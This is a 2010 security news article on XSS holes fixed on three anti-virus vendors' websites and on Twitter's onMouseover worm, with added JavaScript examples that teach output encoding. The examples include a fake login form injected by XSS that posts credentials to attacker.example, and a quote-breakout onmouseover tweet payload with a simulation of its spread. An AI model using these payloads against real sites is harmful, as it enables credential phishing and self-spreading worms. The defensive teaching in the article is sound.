
Three anti-virus firms plug security holes on their own websites


October 4, 2010

Internet security observers have uncovered critical vulnerabilities on the websites of three anti-virus companies, flaws that turned the vendors' own sites into a full-fledged phishing risk.

Cross-site scripting (XSS) flaws of varying severity were found on the sites of Symantec, Eset and Panda Security by Team Elite, a group of self-described 'white-hat' hackers.

A spokesperson from Team Elite said "We notified all three companies of these security flaws and all three responded by fixing them in good time."

XSS holes of the same kind were recently exploited on Twitter's website by the infamous onMouseover worm (covered below), and LinkedIn and Facebook have also been hit by XSS problems lately. The XSS holes on the three anti-virus firms' websites were not exploited, however, and no harm was done.

Nevertheless, Symantec, Eset and Panda Security should all be especially vigilant about setting a good example in Internet security. After all, security is the field they operate in.

But time and experience show that XSS problems are commonplace, even in the information security vendor market.

And because groups such as Team Elite go looking for them in the first place, these issues regularly get a public airing, which is perfectly understandable.

Even though there is no evidence of miscreants exploiting these particular vulnerabilities, that is no reason to dismiss them, as one Team Elite member put it.

Coding errors that give rise to cross-site scripting holes are endemic in Web development, and the trend appears to have been on the rise over the past year. This class of vulnerability allows an attacker to present content from third-party sites (pop-ups, malicious scripts, etc.) as if it came from the site the user was trying to visit: because the injected markup is served by the vulnerable site, the browser runs it with that site's origin and shows that site's address.

The net effect is that such flaws are handy for phishing attacks that dupe an unsuspecting user into handing their credentials over to an untrusted site while the address bar still shows the one they trust.

"A cross-site scripting (XSS) security risk is a high level vulnerability which could allow an attacker to steal sensitive information such as user ID and password information and other sensitive login credentials. I can assure you that our team doesn't do such things, and we don't hack any websites. We simply deliver the proof of concept, spread the knowledge of existing security vulnerabilities so that the companies can correct those flaws themselves and for the benefit of the whole Internet community," said the Team Elite spokesperson.

"We've since noticed that all three security vendors have fixed the XSS security flaws on their own Web sites, which is certainly a good development," he added.
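The flaw class described above, as an added example that is not code from Team Elite or from any of the vendor sites mentioned: a search page that echoes a URL parameter into its HTML, the kind of fake login form a crafted link can inject through it, and the output-encoding fix. It runs stand-alone under Node.js; the vendor and attacker hostnames and the payload are constructed for the example.

```javascript
// Added example (not from the article, Team Elite or any vendor): a reflected XSS
// bug in a search page, the phishing payload it enables, and the encoding fix.
// Runs stand-alone under Node.js. All hostnames and the payload are constructed.

// Minimal HTML encoder, safe for element text and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// VULNERABLE: the search term from the URL is echoed straight into the page.
// Whatever markup the attacker put in the link now renders as part of the site.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>\n<p>No products matched your search.</p>`;
}

// HARDENED: same page, with the untrusted value HTML-encoded before insertion.
function renderSearchHardened(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>\n<p>No products matched your search.</p>`;
}

// Phishing payload of the kind a crafted link could carry in the query parameter
// (constructed for this example). It injects a fake login form whose action points
// at an attacker-controlled host, so the credentials leave the site even though the
// browser's address bar still shows the trusted domain.
const PHISHING_PAYLOAD =
  '<form action="https://attacker.example/collect" method="post">' +
  "Your session has expired, please sign in again: " +
  '<input name="user"> <input name="pass" type="password"> <input type="submit" value="Sign in">' +
  "</form>";

// Scanner-style check (not a browser parser): does the rendered page contain a
// form that submits anywhere other than the trusted origin?
function hasForeignForm(html, trustedOrigin) {
  const formAction = /<form\b[^>]*\baction="([^"]*)"/gi;
  let match;
  while ((match = formAction.exec(html)) !== null) {
    if (!match[1].startsWith(trustedOrigin)) return true;
  }
  return false;
}

// Demo: the same payload through both renderers.
const TRUSTED = "https://vendor.example";
console.log("vulnerable page posts credentials off-site:",
  hasForeignForm(renderSearchVulnerable(PHISHING_PAYLOAD), TRUSTED)); // true
console.log("hardened page posts credentials off-site:",
  hasForeignForm(renderSearchHardened(PHISHING_PAYLOAD), TRUSTED));   // false
```

The hardened renderer does not try to filter "bad" tags out of the input; it encodes the five characters that matter in an HTML text context, so the payload is displayed as literal text rather than parsed as markup. A value placed into a different context (a URL attribute, inline script, CSS) needs that context's encoding instead.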

Beyond security vendor sites, it is becoming apparent that social sites are, on average, not secure either, and the latest flaws being discovered there are troubling. And if it isn't security bugs, it's privacy issues that users seem to face more and more these days.

So some users are now asking: is all of this really worth it? Am I wasting my time and energy on something that isn't worth the risk, given all the security issues?

The flaw, which meant JavaScript could be injected into Tweets, was reintroduced by a site update that Twitter says was unrelated to the recent introduction of the New Twitter. The cross-site scripting hole meant JavaScript ran when users simply rolled their mouse over a link.

But it gets worse.

The flaw was mostly used for mischief, but there were incidents of redirects to porn and shock sites as well, security researchers say. A worm without a malicious payload took advantage of the vulnerability to make users retweet the offending Tweet after they rolled their mouse over a link, creating hundreds of thousands of spam messages in the process, on top of other issues.
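The mechanism described above, as an added example (not Twitter's code and not Holm's worm): a tweet renderer that splices a URL into an href attribute without encoding, so that a double quote in the URL ends the attribute and an onmouseover handler becomes part of the tag; the fixed renderer; and a small model of how a self-retweeting payload spreads through follower timelines. It runs stand-alone under Node.js. The accounts, the follower graph, the hostname and the payload (including the retweetSelf name, which is never executed) are constructed for the example.

```javascript
// Added example (not Twitter's code, not the worm): attribute-context XSS in a
// link renderer, the fix, and a toy simulation of worm spread. Node.js.
// All accounts, URLs and the payload below are constructed for the example.

// Minimal HTML encoder, safe for element text and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const URL_PATTERN = /https?:\/\/\S+/g;

// VULNERABLE: the URL text is concatenated straight into the attribute. A double
// quote inside the URL closes href early and everything after it is parsed as
// further attributes of the <a> tag, event handlers included.
function linkifyVulnerable(text) {
  return text.replace(URL_PATTERN, (url) => `<a href="${url}">${url}</a>`);
}

// HARDENED: parse the URL (the WHATWG parser percent-encodes quotes and other
// junk in the path), accept only http/https, and HTML-encode the result.
function linkifyHardened(text) {
  return text.replace(URL_PATTERN, (url) => {
    let parsed;
    try { parsed = new URL(url); } catch (e) { return escapeHtml(url); }
    if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return escapeHtml(url);
    const safe = escapeHtml(parsed.href);
    return `<a href="${safe}">${safe}</a>`;
  });
}

// Worm-style tweet (constructed): the quote after "@" ends the href value, and
// onmouseover= is then parsed as an attribute. retweetSelf() stands in for
// whatever script a real payload would run; nothing here executes it.
const WORM_TWEET = 'wow http://a.example/@"onmouseover="retweetSelf()"/';

// Does the rendered HTML contain an inline event handler attribute? Mirrors the
// browser's recovery rule that a new attribute may begin right after a closing
// quote, so "onmouseover= counts while a percent-encoded %22onmouseover= does not.
function hasInlineEventHandler(html) {
  return /(^|["'\s])on[a-z]+\s*=/i.test(html);
}

// Follower graph for the simulation (constructed): user -> accounts they follow.
const FOLLOWS = { alice: [], bob: ["alice"], carol: ["bob"], dave: ["bob", "carol"], erin: ["dave"] };

// Each round, every not-yet-infected user views the tweets of the accounts they
// follow through the given renderer and mouses over them. If an injected handler
// is present, that user reposts the payload, so their own followers see it next
// round. Returns how many accounts end up carrying the worm tweet (patient zero
// included).
function simulateWorm(linkify, rounds) {
  const posts = { alice: [WORM_TWEET] };
  for (let r = 0; r < rounds; r++) {
    const newlyInfected = {};
    for (const [user, followed] of Object.entries(FOLLOWS)) {
      if (posts[user]) continue;
      for (const author of followed) {
        for (const tweet of posts[author] || []) {
          if (hasInlineEventHandler(linkify(tweet))) newlyInfected[user] = [tweet];
        }
      }
    }
    Object.assign(posts, newlyInfected);
  }
  return Object.keys(posts).length;
}

console.log("vulnerable renderer, 3 rounds:", simulateWorm(linkifyVulnerable, 3)); // 5
console.log("hardened renderer, 3 rounds:", simulateWorm(linkifyHardened, 3));     // 1
```

Two things the hardened version does that the vulnerable one does not: it validates the scheme, so a javascript: URL can never become a clickable link, and it encodes for the attribute context specifically. Escaping only angle brackets, which is the common half-fix, would not help here, because the break-out character is the double quote.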

Only surfers using Twitter's own website were exposed to the vulnerability; third-party clients were unaffected, at least for now. We will keep you updated if the situation changes.

A Japanese Web application developer called Masato Kinugawa is credited with discovering the hole in August and used it to post multi-coloured rainbow tweets. Scandinavian app developer Magnus Holm then developed at least one of the "worms" that took advantage of the vulnerability.

Holm created the worm to test what was possible, not expecting his creation to spread so quickly. In fact, he was astonished at the speed at which the exploit was travelling.

For its part, Twitter said that while the attack created a huge amount of spam and confusion, no greater security threat was posed and users of compromised accounts need not change their passwords.

However, Kinugawa and Holm both disagree with Twitter's comments, and some say Twitter isn't proactive enough in the matter.

Up to 500,000 users (about 100 per second) may have fallen victim to the cross-site scripting attack, according to an analysis by Kaspersky Labs, and other security firms agree.

"Overall, there is no need to change passwords because user account information wasn't compromised through this exploit," Twitter has reassured users in a blog post written after the security breach.


Source: Team Elite.
